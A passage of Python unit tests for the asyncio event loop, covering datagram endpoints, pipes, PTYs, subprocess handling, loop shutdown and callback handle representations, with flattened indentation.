self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint(self):
self._test_create_datagram_endpoint(('127.0.0.1', 0), socket.AF_INET)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_datagram_endpoint_ipv6(self):
self._test_create_datagram_endpoint(('::1', 0), socket.AF_INET6)
def test_create_datagram_endpoint_sock(self):
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
async def connect():
t, p = await self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces the issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
async def connect():
read_transport, _ = await loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = await loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
async def connect():
t, p = await self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = socket.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
r, w = socket.socketpair()
r.setblocking(False)
f = self.loop.create_task(self.loop.sock_recv(r, 1))
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
async def main():
try:
self.loop.call_soon(f.cancel)
await f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = self.loop.create_task(main())
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
async def wait():
loop = self.loop
await asyncio.sleep(1e-2)
await asyncio.sleep(1e-4)
await asyncio.sleep(1e-6)
await asyncio.sleep(1e-8)
await asyncio.sleep(1e-10)
self.loop.run_until_complete(wait())
# The ideal number of call is 12, but on some platforms, the selector
# may sleep at little bit less than timeout depending on the resolution
# of the clock used by the kernel. Tolerate a few useless calls on
# these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
async def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
async def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = self.loop.create_future()
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
# run_in_executor test is tricky: the method is a coroutine,
# but run_until_complete cannot be called on closed loop.
# Thus iterate once explicitly.
with self.assertRaises(RuntimeError):
it = self.loop.run_in_executor(None, func).__await__()
next(it)
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
with self.assertWarns(DeprecationWarning):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
# bpo-31034: Make sure that we get the default signal handler (killing
# the process). The parent process may have decided to ignore SIGHUP,
# and signal handlers are inherited.
old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
try:
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
finally:
signal.signal(signal.SIGHUP, old_handler)
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
_, proto = yield self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
def test_subprocess_exec_invalid_args(self):
async def connect(**kwds):
await self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
async def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
await self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
if hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class SelectEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
pass
class HandleTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
h.cancel()
self.assertTrue(h.cancelled())
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
with self.assertWarns(DeprecationWarning):
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
h = loop.call_later(0, noop)
check_source_traceback(h)
@unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
'No collections.abc.Coroutine')
def test_coroutine_like_object_debug_formatting(self):
# Test that asyncio can format coroutines that are instances of
# collections.abc.Coroutine, but lack cr_core or gi_code attributes
# (such as ones compiled with Cython).
coro = CoroLike()
coro.__name__ = 'AAA'
self.assertTrue(asyncio.iscoroutine(coro))
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
coro.__qualname__ = 'BBB'
self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')
coro.cr_running = True
self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')
coro.__name__ = coro.__qualname__ = None
self.assertEqual(coroutines._format_coroutine(coro),
'<CoroLike without __name__>() running')
coro = CoroLike()
coro.__qualname__ = 'CoroLike'
# Some coroutines might not have '__name__', such as
# built-in async_gen.asend().
self.assertEqual(coroutines._format_coroutine(coro), 'CoroLike()')
coro = CoroLike()
coro.__qualname__ = 'AAA'
coro.cr_code = None
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
class TimerTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_when(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(when, h.when())
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
# cancel
h.cancel()
self.assertTrue(h.cancelled())
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
